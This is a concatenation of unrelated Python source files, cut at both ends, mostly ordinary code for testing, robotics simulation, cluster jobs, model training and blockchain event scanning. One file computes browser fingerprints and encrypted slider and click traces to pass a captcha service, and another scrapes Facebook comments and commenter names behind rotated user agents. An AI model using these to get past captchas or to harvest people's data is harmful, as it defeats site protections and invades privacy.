policy_downloader(s3) hash_dicts = policy_s3.get_hashes(word_list=['the']) hash_list = [hash_dict['file_hash'] for hash_dict in hash_dicts] assert hash_list == ['x002'] def test_get_hashes(): s3 = boto3.client('s3') stubber = Stubber(s3) with open('tests/test_data/mock_s3_contents.json.gz', 'rb') as mock_hash_file: stubber = stubber_responses(stubber, mock_hash_file) with stubber: policy_s3 = policy_downloader(s3) hash_dicts = policy_s3.get_hashes() hash_list = [hash_dict['file_hash'] for hash_dict in hash_dicts] hash_list.sort() assert hash_list == ['x001', 'x002'] def test_download_all_hash(): s3 = boto3.client('s3') stubber = Stubber(s3) with open('tests/test_data/mock_s3_contents.json.gz', 'rb') as mock_hash_file: stubber = stubber_responses(stubber, mock_hash_file) with stubber: policy_s3 = policy_downloader(s3) documents = policy_s3.download(hash_list=None) document_hashes = [document['file_hash'] for document in documents] document_hashes.sort() assert document_hashes == ['x001', 'x002'] def test_download_one_hash(): s3 = boto3.client('s3') stubber = Stubber(s3) with open('tests/test_data/mock_s3_contents.json.gz', 'rb') as mock_hash_file: stubber = stubber_responses(stubber, mock_hash_file) with stubber: policy_s3 = policy_downloader(s3) documents = policy_s3.download(hash_list=['x002']) document_hashes = [document['file_hash'] for document in documents] assert document_hashes == ['x002'] 10-100 import os import os.path import logging from getpass import getpass from notebook.utils import url_path_join from .handlers import EmailHandler, EmailsListHandler def load_jupyter_server_extension(nb_server_app): """ Called when the extension is loaded. Args: nb_server_app (NotebookWebApplication): handle to the Notebook webserver instance. """ web_app = nb_server_app.web_app emails = nb_server_app.config.get("JupyterLabEmail", {}).get("smtp_servers", {}) # should be a list of template paths user_templates = nb_server_app.config.get("JupyterLabEmail", {}).get( "templates", {} ) headers = nb_server_app.config.get("JupyterLabEmail", {}).get("headers", {}) footers = nb_server_app.config.get("JupyterLabEmail", {}).get("footers", {}) signatures = nb_server_app.config.get("JupyterLabEmail", {}).get("signatures", {}) postprocessors = nb_server_app.config.get("JupyterLabEmail", {}).get( "postprocessors", {} ) base_url = web_app.settings["base_url"] host_pattern = ".*$" logging.critical( "Installing jupyterlab_email handler on path %s" % url_path_join(base_url, "emails") ) logging.critical( "Available email servers: %s" % ",".join(k["name"] for k in emails) ) for k in emails: if "password" in k: logging.critical( "WARNING!!! You should not store your password in jupyter_notebook_config.py!!!" ) elif "function" in k: logging.critical( "Skipping password input for %s@%s" % (k["username"], k["name"]) ) else: k["password"] = getpass( "Input password for %s@%s:" % (k["username"], k["name"]) ) context = {} context["emails"] = emails context["headers"] = headers context["footers"] = footers context["signatures"] = signatures context["postprocessors"] = postprocessors context["user_templates"] = user_templates context["templates"] = {} context["templates"]["email"] = os.path.join( os.path.dirname(__file__), "templates", "html_email.tpl" ) context["templates"]["email_nocode"] = os.path.join( os.path.dirname(__file__), "templates", "hide_code_cells_html_email.tpl" ) context["templates"]["html"] = os.path.join( os.path.dirname(__file__), "templates", "html.tpl" ) context["templates"]["html_nocode"] = os.path.join( os.path.dirname(__file__), "templates", "hide_code_cells_html.tpl" ) context["templates"]["pdf"] = os.path.join( os.path.dirname(__file__), "templates", "pdf.tplx" ) context["templates"]["pdf_nocode"] = os.path.join( os.path.dirname(__file__), "templates", "hide_code_cells_pdf.tplx" ) web_app.add_handlers( host_pattern, [(url_path_join(base_url, "email/get"), EmailsListHandler, context)], ) web_app.add_handlers( host_pattern, [(url_path_join(base_url, "email/run"), EmailHandler, context)] ) import json from ievv_opensource.utils.ievvbuildstatic import pluginbase from ievv_opensource.utils.shellcommandmixin import ShellCommandMixin class Plugin(pluginbase.Plugin, ShellCommandMixin): """ Autosetup jsdoc config and npm script. Examples: It is really simple to use:: IEVVTASKS_BUILDSTATIC_APPS = ievvbuildstatic.config.Apps( ievvbuildstatic.config.App( appname='demoapp', version='1.0.0', plugins=[ ievvbuildstatic.autosetup_jsdoc.Plugin(), ] ) ) If you need to adjust the config, simply setup your own ``build-docs`` script in package.json instead of using this plugin. """ name = 'autosetup_jsdoc' def install(self): self.app.get_installer('npm').queue_install( package='jsdoc', installtype='dev' ) def get_jsdoc_config_filename(self): return 'jsdoc.config.json' def get_jsdoc_config_path(self): return self.app.get_source_path(self.get_jsdoc_config_filename()) def make_jsdoc_config_dict(self): return { "opts": { "encoding": "utf8", "destination": "./built_docs/", "recurse": True }, "source": { "includePattern": ".+\\.js(doc|x)?$", "excludePattern": "(^|\\/|\\\\)_", "include": [ "./scripts/javascript/" ] }, "tags": { "allowUnknownTags": True, "dictionaries": ["jsdoc", "closure"] }, "plugins": ["plugins/markdown"], "markdown": { "parser": "gfm" }, "templates": { "cleverLinks": False, "monospaceLinks": False } } def create_jsdoc_config(self): open(self.get_jsdoc_config_path(), 'w').write( json.dumps( self.make_jsdoc_config_dict(), indent=2, sort_keys=True )) def run(self): self.get_logger().command_start('Autosetup jsdoc for {appname}'.format( appname=self.app.appname)) self.create_jsdoc_config() self.app.get_installer('npm').add_npm_script( 'build-docs', 'jsdoc -c {configpath}'.format( configpath=self.get_jsdoc_config_filename())) self.get_logger().command_success('Autoset jsdoc config succeeded :)') #!/usr/bin/env python3 import time import math from datetime import datetime from time import sleep import numpy as np import random import cv2 import os import argparse import torch from math import sin,cos,acos import matplotlib.pyplot as plt import sys sys.path.append('./Eval') sys.path.append('./') from env import Engine from utils_env import get_view,safe_path,cut_frame,point2traj,get_gripper_pos,backup_code def angleaxis2quaternion(angleaxis): angle = np.linalg.norm(angleaxis) axis = angleaxis / (angle + 0.00001) q0 = cos(angle/2) qx,qy,qz = axis * sin(angle/2) return np.array([qx,qy,qz,q0]) def quaternion2angleaxis(quater): angle = 2 * acos(quater[3]) axis = quater[:3]/(sin(angle/2)+0.00001) angleaxis = axis * angle return np.array(angleaxis) class Engine108(Engine): def __init__(self, worker_id, opti, p_id, taskId=5, maxSteps=15, n_dmps=3, cReward=True): super(Engine108,self).__init__(opti, wid=worker_id, p_id=p_id, maxSteps=maxSteps, taskId=taskId, n_dmps=n_dmps, cReward=cReward,robot_model=None) self.opti = opti def init_obj(self): self.obj_file = os.path.join(self.resources_dir,"urdf/objmodels/nut.urdf") self.obj_position = [0.3637 + 0.06, -0.06, 0.35] self.obj_scaling = 2 self.obj_orientation = self.p.getQuaternionFromEuler([math.pi/2+0.2, -math.pi/2, -0.3]) self.obj_id = self.p.loadURDF(fileName=self.obj_file, basePosition=self.obj_position,baseOrientation=self.obj_orientation, globalScaling=self.obj_scaling)#,physicsClientId=self.physical_id self.box_file = os.path.join (self.resources_dir, "urdf/openbox/openbox.urdf") self.box_position = [0.27, 0.00, -0.30] self.box_scaling = 0.00044 self.box_orientation = self.p.getQuaternionFromEuler ([0, math.pi, -math.pi/2]) self.box_id = self.p.loadURDF (fileName=self.box_file, basePosition=self.box_position, baseOrientation=self.box_orientation, globalScaling=self.box_scaling,useFixedBase=True) self.p.changeVisualShape (self.obj_id, -1, rgbaColor=[38/255.,0.,128/255.0,1]) self.p.changeDynamics(self.obj_id,-1,mass=2.0) def reset_obj(self): self.p.resetBasePositionAndOrientation(self.obj_id, self.obj_position, self.obj_orientation) def init_motion(self): self.data_q = np.load (os.path.join(self.robot_recordings_dir,"47-4/q.npy")) self.data_gripper = np.load (self.configs_dir + '/init/gripper.npy') self.robot.setJointValue(self.data_q[0],gripper=self.data_gripper[0]) def init_grasp(self): self.box_position[2] = -.30 self.p.resetBasePositionAndOrientation(self.box_id,self.box_position,self.box_orientation) self.robot.gripperControl(0) qlist = np.load( os.path.join(self.robot_recordings_dir, "47-4/q.npy")) glist = np.load( os.path.join(self.robot_recordings_dir, "47-4/gripper.npy")) num_q = len(qlist[0]) self.fix_orn = np.load (os.path.join (self.configs_dir, 'init', 'orn.npy')) self.null_q = qlist[180] self.robot.setJointValue(qlist[40],glist[40]) for i in range(40,180,1): glist[i] = min(120,glist[i]) self.robot.jointPositionControl(qlist[i],gripper=glist[i]) pos = self.robot.getEndEffectorPos() pos[2] += 0.15 orn = self.robot.getEndEffectorOrn() for i in range(109): self.robot.operationSpacePositionControl(pos,orn,null_pose=self.null_q,gripperPos=130) # time.sleep(3) self.start_pos = self.p.getLinkState (self.robotId, 7)[0] self.box_position[2] *= -1.0 self.p.resetBasePositionAndOrientation(self.box_id,self.box_position,self.box_orientation) def step_dmp(self,action,f_w,coupling,reset): if reset: action = action.squeeze() self.start_pos = self.robot.getEndEffectorPos() self.start_orn = quaternion2angleaxis(self.robot.getEndEffectorOrn()) self.start_gripper_pos = self.robot.getGripperPos() self.start_status = np.array([self.start_pos[0],self.start_pos[1],self.start_pos[2],self.start_orn[0],self.start_orn[1],self.start_orn[2],0.0]).reshape((-1,)) self.dmp.set_start(np.array(self.start_status)[:self.dmp.n_dmps]) dmp_end_pos = [x+y for x,y in zip(self.start_status,action)] self.dmp.set_goal(dmp_end_pos) if f_w is not None: self.dmp.set_force(f_w) self.dmp.reset_state() #self.traj = self.dmp.gen_traj() self.actual_traj = [] p1 = self.start_pos p1 = np.array(p1) self.dmp.timestep = 0 small_observation = self.step_within_dmp (coupling) #for idx, small_action in enumerate(self.traj): # if idx < 7: # for i in range(4): # small_observation = self.step_within_dmp (small_action) # else: # small_observation = self.step_within_dmp (small_action) #self.actual_traj.append(tmp_pos) #self.a_traj = np.array(self.actual_traj) #p2 = self.robot.getEndEffectorPos() #p2 = np.array(p2) lenT = len(self.dmp.force[:,0]) if self._wid == 0: fig = plt.figure(1) # plt.plot(np.arange(0,lenT),self.traj[:,0],'--',color='r') # plt.plot(np.arange(0,lenT),self.traj[:,1],'--',color='g') # plt.plot(np.arange(0,lenT),self.traj[:,2],'--',color='b') # plt.plot(np.arange(0,lenT),self.a_traj[:,0],color='red') # plt.plot(np.arange(0,lenT),self.a_traj[:,1],color='green') # plt.plot(np.arange(0,lenT),self.a_traj[:,2],color='blue') plt.plot(np.arange(0,lenT),self.dmp.force[:,0],color='red') plt.plot(np.arange(0,lenT),self.dmp.force[:,1],color='green') plt.plot(np.arange(0,lenT),self.dmp.force[:,2],color='blue') fig.canvas.draw() images = np.fromstring(fig.canvas.tostring_rgb(), dtype='uint8').reshape(480, 640, 3) cv2.imshow("Example",images) fig.canvas.figure.clf() cv2.waitKey(1) else: small_observation = self.step_within_dmp(coupling) seg = None observation_next, seg = self.get_observation(segFlag=True) reward = 0 done = False suc = False suc_info = self.get_success() if self.dmp.timestep >= self.dmp.timesteps: reward, done, suc = self.get_reward(seg) done = True self.success_flag = suc_info else: if np.sum(seg == 167772162) < 1: done = True self.success_flag = False return observation_next, reward, done, self.success_flag def get_success(self): box = self.p.getAABB (self.box_id, -1) box_center = [(x + y) * 0.5 for x, y in zip (box[0], box[1])] box_center = np.array(box_center) obj = self.p.getAABB (self.obj_id, -1) obj_center = [(x + y) * 0.5 for x, y in zip (obj[0], obj[1])] obj_center = np.array(obj_center) dist = np.linalg.norm(box_center - obj_center) # check whether the object is still in the gripper left_closet_info = self.p.getContactPoints (self.robotId, self.obj_id, self.robot.gripper_left_tip_index, -1) right_closet_info = self.p.getContactPoints (self.robotId, self.obj_id, self.robot.gripper_right_tip_index, -1) #print(len (left_closet_info),len (right_closet_info),obj[0][0], box[1][0]) if len (left_closet_info) > 0 and len (right_closet_info) > 0 and dist < 0.05: return True else: return False bccho/hpctools1-10 import subprocess import json from time import time, sleep import logging class SLURMCluster: """ Session manager for interacting with a SLURM-based cluster over SSH. Note: For authentication, generate a private/public key (e.g., with ssh-keygen) and copy public key to "~/.ssh/authorized_keys" on cluster. """ def __init__(self, host, user): """ Initializes session parameters. Args: host: cluster address user: username for authentication """ self.host = host self.user = user def run_cmd(self, cmd, encoding="utf-8"): """ Runs commands over ssh and returns output. """ # Concatenate multiple commands (lines) if type(cmd) == list: cmd = " && ".join(cmd) # Call ssh with auth and commands proc = subprocess.run(["ssh", self.user + "@" + self.host, cmd], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding=encoding) # Return outputs return proc.stdout def submit_job(self, script_path, script_args=[], slurm_args=[], working_directory="$HOME"): """ Submits a job via sbatch and returns the job ID. """ if type(script_args) == list: script_args = " ".join(script_args) if type(slurm_args) == list: slurm_args = " ".join(slurm_args) out = self.run_cmd([ "cd \"%s\"" % working_directory, "sbatch " + slurm_args + " " + script_path + " " + script_args ]) if not "Submitted batch job" in out: # TODO: raise exception logging.error("Failed to submit job: " + out) return None # Get job ID from output and return return out.split()[-1] def cancel_job(self, job_id): """ Cancels a job via scancel. """ self.run_cmd("scancel %s" % job_id) def get_job_state(self, job_id, compact=False): """ Returns job status code or None if does not exist. Status codes (from `man squeue`): (short code) (BF) BOOT_FAIL: Job terminated due to launch failure, typically due to a hardware failure (e.g. unable to boot the node or block and the job can not be requeued). (CA) CANCELLED: Job was explicitly cancelled by the user or system administrator. The job may or may not have been initiated. (CD) COMPLETED: Job has terminated all processes on all nodes with an exit code of zero. (CF) CONFIGURING: Job has been allocated resources, but are waiting for them to become ready for use (e.g. booting). (CG) COMPLETING: Job is in the process of completing. Some processes on some nodes may still be active. (DL) DEADLINE: Job terminated on deadline. (F) FAILED: Job terminated with non-zero exit code or other failure condition. (NF) NODE_FAIL: Job terminated due to failure of one or more allocated nodes. (OOM) OUT_OF_MEMORY: Job experienced out of memory error. (PD) PENDING: Job is awaiting resource allocation. (PR) PREEMPTED: Job terminated due to preemption. (R) RUNNING: Job currently has an allocation. (RD) RESV_DEL_HOLD: Job is held. (RF) REQUEUE_FED: Job is being requeued by a federation. (RH) REQUEUE_HOLD: Held job is being requeued. (RQ) REQUEUE: Completing job is being requeued. (RS) RESIZING: Job is about to change size. (RV) REVOKED: Sibling was removed from cluster due to other cluster starting the job. (S) SUSPENDED: Job has an allocation, but execution has been suspended and CPUs have been released for other jobs. (SE) SPECIAL_EXIT: The job was requeued in a special state. This state can be set by users, typically in EpilogSlurmctld, if the job has terminated with a particular exit value. (SI) SIGNALING: Job is being signaled. (ST) STOPPED: Job has an allocation, but execution has been stopped with SIGSTOP signal. CPUS have been retained by this job. (TO) TIMEOUT: Job terminated upon reaching its time limit. """ code = "state" if compact: code = "statecompact" # Query squeue for state out = self.run_cmd('squeue -j %s --Format="%s"' % (str(job_id), code)) # Check if job exists if "slurm_load_jobs error: Invalid job id specified" in out: return None return out.splitlines()[-1].strip() def job_info(self, job_id): """ Returns squeue info about a job or None if it does not exist. See `man squeue` for possible fields. """ # Query squeue for all available info out = self.run_cmd("squeue -j " + str(job_id) + " --format="+'"%all"') # Check if job exists if "slurm_load_jobs error: Invalid job id specified" in out: return None # Split output into cells fields, vals = [row.split("|") for row in out.splitlines()] # Return dictionary from filtered job data return {k: v for k,v in zip(fields, vals) if len(k) > 0} def wait_for_job(self, job_id, timeout=60, poll_interval=1, verbose=True): """ Blocks until job starts running. Args: job_id: SLURM job ID (str or int) timeout: seconds before returning or None to wait indefinitely (default: 60) poll_interval: seconds between polling (default: 1) verbose: print status messages (default: True) Returns: is_running: True if the job started running, False if timed out total_time_elapsed: total seconds spent waiting """ if verbose: print("Waiting for job %s... " % str(job_id), end="", flush=True) t0 = time() done = False while not done: # Poll for job state t0_poll = time() is_running = self.get_job_state(job_id) == "RUNNING" # Compute timing poll_elapsed = time() - t0_poll total_time_elapsed = time() - t0 # Check for timeout timed_out = timeout is not None and (time() - t0) >= timeout # Should we stop? done = is_running or timed_out if not done: # Compute poll interval remaining interval_remaining = max([poll_interval - poll_elapsed, 0]) # Wait sleep(interval_remaining) if verbose: if is_running: print("Running after %.1f seconds." % total_time_elapsed) elif timed_out: print("Timed out after %.1f seconds." % total_time_elapsed) else: print("Failed to run after %.1f seconds." % total_time_elapsed) return is_running, total_time_elapsed from requests_soup import chorme_get_page from user_agent import generate_user_agent from bs4 import BeautifulSoup from random import randint import requests import time import re # Full article def get_article_content(content_url): headers = {'User-Agent':generate_user_agent()} # article_res = requests.get(content_url, headers=headers) # article_soup = BeautifulSoup(article_res.text, 'html.parser') article_soup = chorme_get_page(content_url) article_contents = article_soup.select('div[style=""]')[0].text return article_contents # All comments def get_comments(comment_url, comment_nums): all_comments = list() for i in range(0, comment_nums, 10): headers = {'User-Agent':generate_user_agent()} payload = { 'p':i, 'refid':'18' } res_comments = requests.get(comment_url, headers=headers, params=payload) soup_comment = BeautifulSoup(res_comments.text, 'html.parser') for com in soup_comment.find_all(id=re.compile(r'^\d{10,17}')): # if comment in comments more_comments = com.find_all(id=re.compile('comment_replies_more.+')) if more_comments: more_comments = 'https://mbasic.facebook.com'+com.find_all(id=re.compile('comment_replies_more.+'))[0].a['href'] # print(more_comments) time.sleep(randint(3,6)) res_more = requests.get(more_comments, headers=headers) soup_more = BeautifulSoup(res_more.text, 'html.parser') for m in soup_more.find_all(id=re.compile(r'\d{10,17}')): per_comment = {} reponse_id = m['id'] per_comment['id']=reponse_id # print(m['id'], end=', ') response_name = m.a.text per_comment['name'] = response_name # print(m.a.text, end=', ') # 如果留言中的留言超過10筆,會有額外的url try: response_content = m.div.div.text per_comment['comment'] = response_content # print(m.div.div.text) except AttributeError as e: print(e) pass all_comments.append(per_comment) else: per_comment = {} reponse_id = com['id'] per_comment['id']=reponse_id # print(com['id']) response_name = com.a.text per_comment['name'] = response_name # print(com.a.text, end=":") response_content = com.select('div')[0].text.split('讚')[0].replace(response_name,'') per_comment['comment'] = response_content # print(com.select('div')[0].text.split('讚')[0].replace(com.a.text,'')) all_comments.append(per_comment) time.sleep(randint(3,7)) time.sleep(randint(2,8)) return all_comments if __name__ == '__main__': url = 'https://mbasic.facebook.com/comment/replies/?ctoken=&count=11&curr&pc=1&ft_ent_identifier=5413685551983107&gfid=AQCCwRAMTgknIVNB_EU&refid=18&__tn__=R' get_comments(url, 2115)src/tricks/calculator.py import ast import math import operator from flask import Flask, url_for, make_response from utils.utils import l_singleton2obj # app = Flask(__name__) # def index(): operators = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul, ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv, ast.Pow: operator.pow, ast.BitXor: operator.xor, ast.USub: operator.neg, ast.Mod: operator.mod, } h_func_unary = {"sin": math.sin, "cos": math.cos, "tan": math.tan, "floor": math.floor, "ceil": math.ceil, "round": round, } h_name = {"PI": math.pi} def calculate(s_IN, ): h_env = {} try: s_OUT = _eval_calculate(ast.parse(s_IN, mode='eval').body, h_env) return s_OUT except: return make_response("Invalid input: '{0}'".format(s_IN)) def _eval_calculate(node, h_env): t = type(node) if isinstance(node, ast.Num): # return node.n if isinstance(node, ast.BinOp): # v_LEFT = _eval_calculate(node.left, h_env) v_RIGHT = _eval_calculate(node.right, h_env) f_op = operators[type(node.op)] return f_op(v_LEFT, v_RIGHT) if isinstance(node, ast.UnaryOp): # e.g., -1 v_OPERAND = _eval_calculate(node.operand, h_env) f_op = operators[type(node.op)] return f_op(v_OPERAND) if isinstance(node, ast.Name): if node.id not in h_name: raise Exception() return h_name[node.id] if isinstance(node, ast.Call): func_name = node.func.id.lower() if func_name in h_func_unary: if len(node.args) > 1: raise Exception() if node.keywords: raise Exception() f_op = h_func_unary[func_name] arg = _eval_calculate(l_singleton2obj(node.args), h_env) return f_op(arg) raise TypeError(node) qqizai/Func_Js_Crack # -*- coding: utf-8 -*- # @Time : 2019/11/1 21:58 # @Author : Esbiya # @Email : # @File : encrypt.py # @Software: PyCharm import execjs def _reload_js(): """ 加载 js :return: """ with open('yd_slider.js', 'rb') as f: slider_js = f.read().decode() with open('generate_fp.js', 'rb') as f: fp_js = f.read().decode() return slider_js, fp_js def _get_cb(js): """ 生成 cp 参数 :param js: :return: """ ctx = execjs.compile(js) return ctx.call('get_cb')[:64] def _get_fp(js): """ 生成指纹 fp :param js: :return: """ ctx_ = execjs.compile(js) return ctx_.call('generateFingerprint') def _encrypt_slider(js, token, trace, width): """ 滑块验证加密 加密轨迹 :param token: :param trace: :param width :return: """ ctx = execjs.compile(js) return ctx.call('slider_encrypt', token, trace, width) def _encrypt_click(js, token, trace, position): """ 点选验证加密 加密轨迹与点选位置 :param js: :param token: :param trace: :param position: :return: """ ctx = execjs.compile(js) return ctx.call('click_encrypt', token, trace, position) def _encrypt_sense(js, token, trace, position): """ 无感验证加密 加密轨迹与点击位置 :param js: :param token: :param trace: :param position: :return: """ ctx = execjs.compile(js) return ctx.call('sense_encrypt', token, trace, position) def _encrypt_validate(js, validate, fp): """ 加密 validate :param js: :param validate: 验证码通过签名 :param fp: 指纹 :return: """ ctx = execjs.compile(js) return ctx.call('encrypt_validate', validate, fp) from prerequisites import * def train_model(epoch_count, batch_size, file_suffix, optimizer): # get dataset class_count, train_datagen, train_generator, val_datagen, val_generator, test_datagen, test_generator \ = get_data(batch_size) train_steps = len(train_generator.filenames) // batch_size val_steps = len(val_generator.filenames) // batch_size test_steps = len(test_generator.filenames) // batch_size # get model with trainable: last convolutional layer & all fully connected layers model = get_prepared_model(class_count, first_trainable_layer='block1_conv1') # compile model model.compile( loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy']) # train model training_history = model.fit_generator( train_generator, steps_per_epoch=train_steps, epochs=epoch_count, validation_data=val_generator, validation_steps=val_steps, callbacks=[callbacks.EarlyStopping(monitor='val_loss', patience=20, verbose=0, min_delta=1e-4)] ) model.save(f'results/learned_vgg16_Z2a{file_suffix}.h5') # test model test_score = model.evaluate_generator(test_generator, steps=test_steps) print(f'\n\n{file_suffix}') print(f'Test loss: {test_score[0]}') print(f'Test acc: {test_score[1]}') # pickle learning history with open(f'results/history_vgg16_Z2a{file_suffix}.pickle', 'wb') as file: pickle.dump(training_history, file) del training_history del model K.clear_session() gc.collect() def experiment_learning_rate(): batch_size = 20 epoch_count = 50 for learning_rate in [0.001, 0.0005, 0.0001, 0.00005]: train_model( epoch_count=epoch_count, batch_size=batch_size, file_suffix=f'_learning_rate_{learning_rate}', optimizer=optimizers.RMSprop(learning_rate=learning_rate) ) def experiment_batch_size(): learning_rate = 0.00005 epoch_count = 70 optimizer = optimizers.RMSprop(learning_rate=learning_rate) for batch_size in [5, 10, 15, 20]: train_model( epoch_count=epoch_count, batch_size=batch_size, file_suffix=f'_batch_size_{batch_size}', optimizer=optimizer ) train_model( epoch_count=70, batch_size=10, file_suffix=f'_adam_2c_batch_v1_', optimizer=optimizers.Adam(lr=0.00001) ) modules/google-earth-engine/docker/src/sepalinternal/mosaic/haze.py from ..image_operation import ImageOperation import ee def mask_haze(mosaic_def, collection): if mosaic_def.haze_tolerance == 1: return collection # No point of reducing and mapping the collection if we have full haze tolerance max_haze_score = collection.select('hazeScore').max() return collection.map( lambda image: _MaskHaze(image).apply(mosaic_def.haze_tolerance, max_haze_score)) class _MaskHaze(ImageOperation): def __init__(self, image): super(_MaskHaze, self).__init__(image) def apply(self, haze_tolerance, max_haze_score): score_threshold = max_haze_score.multiply(1 - haze_tolerance) if haze_tolerance > 0: score_threshold = score_threshold.min(9100) mask = self.toImage('hazeScore').gte(score_threshold) return self.image.updateMask(mask) datafreezer/signals.py # Imports from django. # NOQA # from django.conf import settings # from django.core.mail import EmailMultiAlternatives # from django.db.models.signals import ( # post_save, # NOQA # # pre_save, # ) # from django.dispatch import receiver, Signal # from django.template.loader import render_to_string pass import shutil from pathlib import Path import pytest @pytest.fixture def d2b_run_e2e(tmpdir) -> Path: src = Path(__file__).parent / "data/d2b_run_e2e" dst = Path(tmpdir) / "d2b_run_e2e" shutil.copytree(src, dst) return dst @pytest.fixture def scaffold_test_data(tmpdir: str) -> Path: src = Path(__file__).parent / "data/scaffold_test" dst = Path(tmpdir) / "scaffold_test" shutil.copytree(src, dst) return dst # type: ignore """ How to scan and store past events in the blockchain, using web3.eth.get_logs. Taken from https://web3py.readthedocs.io/en/stable/examples.html#advanced-example-fetching-all-token-transfer-events --- A stateful event scanner for Ethereum-based blockchains using Web3.py. With the stateful mechanism, you can do one batch scan or incremental scans, where events are added wherever the scanner left off. """ import datetime import time import logging from abc import ABC, abstractmethod from typing import Tuple, Optional, Callable, List, Iterable from web3 import Web3 from web3.contract import Contract from web3.datastructures import AttributeDict from web3.exceptions import BlockNotFound from eth_abi.codec import ABICodec # Currently this method is not exposed over official web3 API, # but we need it to construct eth_getLogs parameters from web3._utils.filters import construct_event_filter_params from web3._utils.events import get_event_data logger = logging.getLogger(__name__) class EventScannerState(ABC): """Application state that remembers what blocks we have scanned in the case of crash. """ @abstractmethod def get_last_scanned_block(self) -> int: """Number of the last block we have scanned on the previous cycle. :return: 0 if no blocks scanned yet """ @abstractmethod def start_chunk(self, block_number: int): """Scanner is about to ask data of multiple blocks over JSON-RPC. Start a database session if needed. """ @abstractmethod def end_chunk(self, block_number: int): """Scanner finished a number of blocks. Persistent any data in your state now. """ @abstractmethod def process_event(self, block_when: datetime.datetime, event: AttributeDict) -> object: """Process incoming events. This function takes raw events from Web3, transforms them to your application internal format, then saves them in a database or some other state. :param block_when: When this block was mined :param event: Symbolic dictionary of the event data :return: Internal state structure that is the result of event tranformation. """ @abstractmethod def delete_data(self, since_block: int) -> int: """Delete any data since this block was scanned. Purges any potential minor reorg data. """ class EventScanner: """Scan blockchain for events and try not to abuse JSON-RPC API too much. Can be used for real-time scans, as it detects minor chain reorganisation and rescans. Unlike the easy web3.contract.Contract, this scanner can scan events from multiple contracts at once. For example, you can get all transfers from all tokens in the same scan. You *should* disable the default `http_retry_request_middleware` on your provider for Web3, because it cannot correctly throttle and decrease the `eth_getLogs` block number range. """ def __init__(self, web3: Web3, contract: Contract, state: EventScannerState, events: List, filters: {}, max_chunk_scan_size: int = 10000, max_request_retries: int = 30, request_retry_seconds: float = 3.0): """ :param contract: Contract :param events: List of web3 Event we scan :param filters: Filters passed to getLogs :param max_chunk_scan_size: JSON-RPC API limit in the number of blocks we query. (Recommendation: 10,000 for mainnet, 500,000 for testnets) :param max_request_retries: How many times we try to reattempt a failed JSON-RPC call :param request_retry_seconds: Delay between failed requests to let JSON-RPC server to recover """ self.logger = logger self.contract = contract self.web3 = web3 self.state = state self.events = events self.filters = filters # Our JSON-RPC throttling parameters self.min_scan_chunk_size = 10 # 12 s/block = 120 seconds period self.max_scan_chunk_size = max_chunk_scan_size self.max_request_retries = max_request_retries self.request_retry_seconds = request_retry_seconds # Factor how fast we increase the chunk size if results are found # # (slow down scan after starting to get hits) self.chunk_size_decrease = 0.5 # Factor how was we increase chunk size if no results found self.chunk_size_increase = 2.0 @property def address(self): return self.token_address def get_block_timestamp(self, block_num) -> datetime.datetime: """Get Ethereum block timestamp""" try: block_info = self.web3.eth.getBlock(block_num) except BlockNotFound: # Block was not mined yet, # minor chain reorganisation? return None last_time = block_info["timestamp"] return datetime.datetime.utcfromtimestamp(last_time) def get_suggested_scan_start_block(self): """Get where we should start to scan for new token events. If there are no prior scans, start from block 1. Otherwise, start from the last end block minus ten blocks. We rescan the last ten scanned blocks in the case there were forks to avoid misaccounting due to minor single block works (happens once in a hour in Ethereum). These heurestics could be made more robust, but this is for the sake of simple reference implementation. """ end_block = self.get_last_scanned_block() if end_block: return max(1, end_block - self.NUM_BLOCKS_RESCAN_FOR_FORKS) return 1 def get_suggested_scan_end_block(self): """Get the last mined block on Ethereum chain we are following.""" # Do not scan all the way to the final block, as this # block might not be mined yet return self.web3.eth.blockNumber - 1 def get_last_scanned_block(self) -> int: return self.state.get_last_scanned_block() def delete_potentially_forked_block_data(self, after_block: int): """Purge old data in the case of blockchain reorganisation.""" self.state.delete_data(after_block) def scan_chunk(self, start_block, end_block) -> Tuple[int, datetime.datetime, list]: """Read and process events between to block numbers. Dynamically decrease the size of the chunk if the case JSON-RPC server pukes out. :return: tuple(actual end block number, when this block was mined, processed events) """ block_timestamps = {} get_block_timestamp = self.get_block_timestamp # Cache block timestamps to reduce some RPC overhead # Real solution might include smarter models around block def get_block_when(block_num): if block_num not in block_timestamps: block_timestamps[block_num] = get_block_timestamp(block_num) return block_timestamps[block_num] all_processed = [] for event_type in self.events: # Callable that takes care of the underlying web3 call def _fetch_events(_start_block, _end_block): return _fetch_events_for_all_contracts(self.web3, event_type, self.filters, from_block=_start_block, to_block=_end_block) # Do `n` retries on `eth_getLogs`, # throttle down block range if needed end_block, events = _retry_web3_call( _fetch_events, start_block=start_block, end_block=end_block, retries=self.max_request_retries, delay=self.request_retry_seconds) for evt in events: idx = evt["logIndex"] # Integer of the log index position in the block, null when its pending # We cannot avoid minor chain reorganisations, but # at least we must avoid blocks that are not mined yet assert idx is not None, "Somehow tried to scan a pending block" block_number = evt["blockNumber"] # Get UTC time when this event happened (block mined timestamp) # from our in-memory cache block_when = get_block_when(block_number) logger.debug("Processing event %s, block:%d count:%d", evt["event"], evt["blockNumber"]) processed = self.state.process_event(block_when, evt) all_processed.append(processed) end_block_timestamp = get_block_when(end_block) return end_block, end_block_timestamp, all_processed def estimate_next_chunk_size(self, current_chuck_size: int, event_found_count: int): """Try to figure out optimal chunk size Our scanner might need to scan the whole blockchain for all events * We want to minimize API calls over empty blocks * We want to make sure that one scan chunk does not try to process too many entries once, as we try to control commit buffer size and potentially asynchronous busy loop * Do not overload node serving JSON-RPC API by asking data for too many events at a time Currently Ethereum JSON-API does not have an API to tell when a first event occurred in a blockchain and our heuristics try to accelerate block fetching (chunk size) until we see the first event. These heurestics exponentially increase the scan chunk size depending on if we are seeing events or not. When any transfers are encountered, we are back to scanning only a few blocks at a time. It does not make sense to do a full chain scan starting from block 1, doing one JSON-RPC call per 20 blocks. """ if event_found_count > 0: # When we encounter first events, reset the chunk size window current_chuck_size = self.min_scan_chunk_size else: current_chuck_size *= self.chunk_size_increase current_chuck_size = max(self.min_scan_chunk_size, current_chuck_size) current_chuck_size = min(self.max_scan_chunk_size, current_chuck_size) return int(current_chuck_size) def scan(self, start_block, end_block, start_chunk_size=20, progress_callback=Optional[Callable]) -> Tuple[ list, int]: """Perform a token balances scan. Assumes all balances in the database 